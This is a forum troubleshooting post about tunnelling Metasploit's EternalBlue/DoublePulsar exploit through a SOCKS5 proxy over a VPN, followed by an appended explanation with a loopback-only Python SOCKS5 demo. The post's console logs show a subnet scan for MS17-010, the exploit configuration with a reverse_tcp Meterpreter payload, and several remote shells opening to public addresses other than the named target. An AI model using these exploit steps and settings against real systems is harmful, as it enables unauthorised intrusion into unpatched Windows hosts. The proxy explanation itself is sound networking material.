
Can eternalblue run through a socks4 or 5 proxy?


staggerlee


Hi all,

I am trying to run some personal ms17_010 pen testing over a SOCKS5 proxy which is port forwarded over a VPN.

The primary issue I am trying to resolve is getting EternalBlue data to traverse the SOCKS proxy using "set ReverseAllowProxy true"; it may be the case that it is not even supported.
The SOCKS setup itself does work: I am able to run the setup on Windows and successfully tunnel an IP range scan through it using Proxify.
It looks like the route is attempting to use the public IP address of the SOCKS proxy and/or target machine, rather than the loopback SOCKS path.

Below, I have added some of the output and examples of the config/method I am attempting. This is my first attempt at this.

A couple of things to note:
I have removed the public IP addresses from the output.
I have attempted setting PROCESSINJECT = lsass.exe and also TARGETARCHITECTURE = x64; these gave the same results as posted.
10.7.0.62 is the private address of tun0/VPN.
Port 8484 is open through the VPN via port forwarding. It is not in use prior to running.
Kali version - 2020.1
Kali installation - VirtualBox VM, running installed version.

       =[ metasploit v5.0.70-dev                          ]
+ -- --=[ 1961 exploits - 1091 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > setg Proxies socks5:127.0.0.1:57366
Proxies => socks5:127.0.0.1:57366
msf5 > use auxiliary/scanner/smb/smb_ms17_010 
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.2.1/24
rhosts => 192.168.2.1/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 64
threads => 64
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit -j
[*] Auxiliary module running as background job 0.
msf5 auxiliary(scanner/smb/smb_ms17_010) > 
[*] 192.168.2.1/24:445    - Scanned  34 of 256 hosts (13% complete)
[*] 192.168.2.1/24:445    - Scanned  60 of 256 hosts (23% complete)
[+] 192.168.2.103:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[+] 192.168.2.100:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[+] 192.168.2.106:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit) 


----------
---EXAMPLE of detected hosts---
----------

msf5 exploit(windows/smb/eternalblue_doublepulsar) > use exploit/windows/smb/eternalblue_doublepulsar 
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[-] 192.168.2.103:445 - Exploit failed: RuntimeError TCP connect-back payloads cannot be used with Proxies. Use 'set ReverseAllowProxy true' to override this behaviour.
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set ReverseAllowProxy true
ReverseAllowProxy => true


----------
---EXAMPLE of setting ReverseAllowProxy true---
----------

msf5 exploit(windows/smb/eternalblue_doublepulsar) > options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                  Required  Description
   ----                ---------------                                  --------  -----------
   DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
   PROCESSINJECT       explorer.exe                                     yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOSTS              192.168.2.103                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT               445                                              yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.7.0.62        yes       The listen address (an interface may be specified)
   LPORT     8484             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   8   Windows 7 (all services pack) (x86) (x64)


msf5 exploit(windows/smb/eternalblue_doublepulsar) > 


----------
---EXAMPLE of set options---
----------

msf5 exploit(windows/smb/eternalblue_doublepulsar) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.7.0.62:8484 
msf5 exploit(windows/smb/eternalblue_doublepulsar) > [*] 192.168.2.103:445 - Generating Eternalblue XML data
[*] 192.168.2.103:445 - Generating Doublepulsar XML data
[*] 192.168.2.103:445 - Generating payload DLL for Doublepulsar
[*] 192.168.2.103:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.2.103:445 - Launching Eternalblue...
[*] Sending stage (180291 bytes) to 45.x.x.x
[*] Meterpreter session 1 opened (10.7.0.62:8484 -> 45.x.x.x:52873) at 2020-01-23 09:59:22 +0000
[*] Sending stage (180291 bytes) to 45.x.x.x
[*] Meterpreter session 2 opened (10.7.0.62:8484 -> 45.x.x.x:52872) at 2020-01-23 09:59:24 +0000
[*] Sending stage (180291 bytes) to 115.x.x.x
[*] 192.168.2.103 - Meterpreter session 2 closed.  Reason: Died
[*] Meterpreter session 3 opened (10.7.0.62:8484 -> 115.x.x.x:51837) at 2020-01-23 09:59:25 +0000
[*] Sending stage (180291 bytes) to 45.x.x.x
[*] 192.168.2.103 - Meterpreter session 3 closed.  Reason: Died
[*] Meterpreter session 4 opened (10.7.0.62:8484 -> 45.x.x.x:52874) at 2020-01-23 09:59:27 +0000
[*] Sending stage (180291 bytes) to 115.x.x.x
[*] 192.168.2.103 - Meterpreter session 4 closed.  Reason: Died
[*] Meterpreter session 5 opened (10.7.0.62:8484 -> 115.x.x.x:51838) at 2020-01-23 09:59:29 +0000
[*] Sending stage (180291 bytes) to 45.x.x.x
[*] 192.168.2.103 - Meterpreter session 5 closed.  Reason: Died
[*] Meterpreter session 6 opened (10.7.0.62:8484 -> 45.x.x.x:52876) at 2020-01-23 09:59:30 +0000
[*] Sending stage (180291 bytes) to 115.x.x.x
[*] 192.168.2.103 - Meterpreter session 6 closed.  Reason: Died
[*] Meterpreter session 7 opened (10.7.0.62:8484 -> 115.x.x.x:51839) at 2020-01-23 09:59:31 +0000
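Added example, not code from the original post or from Metasploit. Metasploit's `Proxies` option only applies to connections the framework itself opens, i.e. the exploit's outbound SMB session to RHOST:445. A `reverse_tcp` payload is a separate connection that the target initiates towards LHOST:LPORT, and the target has no knowledge of a SOCKS proxy on the attacker's loopback, which is what the "TCP connect-back payloads cannot be used with Proxies" guard is warning about. That matches the output above: the handler on 10.7.0.62:8484 sees its peers as the VPN-side addresses 45.x.x.x and 115.x.x.x, never as 192.168.2.103. The script below models both directions offline with a minimal SOCKS5 (RFC 1928) CONNECT client, an in-process SOCKS5 server that logs every destination it is asked to reach, and an echo "target"; all hosts and ports are constructed on 127.0.0.1 and the names `TinySocks5Proxy`, `socks5_connect` and `demo_both_directions` are this example's own.

```python
# Added example, not from the original post or from Metasploit: a minimal SOCKS5
# (RFC 1928) CONNECT client plus an in-process SOCKS5 server and an echo "target",
# all on 127.0.0.1 so it runs offline. It shows that `Proxies socks5:...` tunnels
# only the exploit's own outbound connection; a connect-back from the target
# reaches LHOST:LPORT directly and never passes through the proxy.
import socket
import struct
import threading

def _recv_exact(s, n):
    """Read exactly n bytes; SOCKS fields are fixed-size, so a short read breaks parsing."""
    buf = b""
    while len(buf) < n:
        chunk = s.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during SOCKS exchange")
        buf += chunk
    return buf

def socks5_connect(proxy, dst_host, dst_port, timeout=5.0):
    """Return a socket to dst_host:dst_port tunnelled through proxy=(host, port), no auth."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(b"\x05\x01\x00")                      # VER=5, NMETHODS=1, METHOD=0 (no auth)
    if _recv_exact(s, 2) != b"\x05\x00":
        s.close()
        raise ConnectionError("proxy refused the no-auth method")
    name = dst_host.encode()                        # ATYP=3 (domain): the proxy resolves it
    s.sendall(b"\x05\x01\x00\x03" + bytes([len(name)]) + name + struct.pack("!H", dst_port))
    _ver, rep, _rsv, atyp = _recv_exact(s, 4)       # VER REP RSV ATYP, then BND.ADDR BND.PORT
    if rep != 0:
        s.close()
        raise ConnectionError(f"CONNECT rejected, REP=0x{rep:02x}")
    _recv_exact(s, ({1: 4, 4: 16}.get(atyp) or _recv_exact(s, 1)[0]) + 2)  # skip BND.ADDR/PORT
    return s

def _pump(src, dst):
    """Relay src -> dst until EOF, then close dst (src is dst gives an echo loop)."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    dst.close()

def _listen():
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))                      # ephemeral port, loopback only
    srv.listen(5)
    return srv

def _serve(srv, handler):
    def loop():
        while True:
            c, _ = srv.accept()
            threading.Thread(target=handler, args=(c,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()

class TinySocks5Proxy:
    """CONNECT only (BIND/UDP get REP=0x07); every requested destination is logged in .requests."""
    def __init__(self):
        self.sock = _listen()
        self.port = self.sock.getsockname()[1]
        self.requests = []                          # (cmd, host, port) per client request
        _serve(self.sock, self._handle)

    def _handle(self, c):
        _ver, nmethods = _recv_exact(c, 2)
        _recv_exact(c, nmethods)
        c.sendall(b"\x05\x00")                      # pick no-auth
        _ver, cmd, _rsv, _atyp = _recv_exact(c, 4)  # ATYP=3 only, which is what our client sends
        host = _recv_exact(c, _recv_exact(c, 1)[0]).decode()
        (port,) = struct.unpack("!H", _recv_exact(c, 2))
        self.requests.append((cmd, host, port))
        if cmd != 1:                                # 0x02 BIND / 0x03 UDP: not supported here
            c.sendall(b"\x05\x07\x00\x01" + bytes(6)); c.close(); return
        try:
            up = socket.create_connection((host, port), timeout=5)
        except OSError:
            c.sendall(b"\x05\x05\x00\x01" + bytes(6)); c.close(); return   # connection refused
        c.sendall(b"\x05\x00\x00\x01" + bytes(6))   # success; BND.ADDR/PORT zeroed
        threading.Thread(target=_pump, args=(c, up), daemon=True).start()
        threading.Thread(target=_pump, args=(up, c), daemon=True).start()

def demo_both_directions():
    """Exploit side: our connection to the 'target' goes via the proxy, which logs the CONNECT.
    Payload side: the 'target' dials the handler directly and the proxy log does not grow."""
    proxy = TinySocks5Proxy()
    target = _listen()                              # stand-in for RHOST:445, echoes bytes back
    _serve(target, lambda c: _pump(c, c))
    s = socks5_connect(("127.0.0.1", proxy.port), "127.0.0.1", target.getsockname()[1])
    s.sendall(b"SMB probe")
    reply = _recv_exact(s, len(b"SMB probe"))
    s.close()
    handler = _listen()                             # the reverse_tcp listener, LHOST:LPORT
    lport = handler.getsockname()[1]
    threading.Thread(target=lambda: socket.create_connection(("127.0.0.1", lport)).close(),
                     daemon=True).start()
    conn, peer = handler.accept()                   # peer is the target itself, not the proxy
    conn.close()
    return reply, list(proxy.requests), peer[0]
```

Running `demo_both_directions()` returns the echoed probe, a proxy log with exactly one CONNECT entry for the target, and the handler's peer address. The second half is the practical takeaway: because the proxy sees nothing of the connect-back, `ReverseAllowProxy true` only silences the check; the payload still needs LHOST/LPORT to be an address the target can route to on its own (here the port-forwarded VPN address), or a bind payload connected to through the proxy instead.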


 
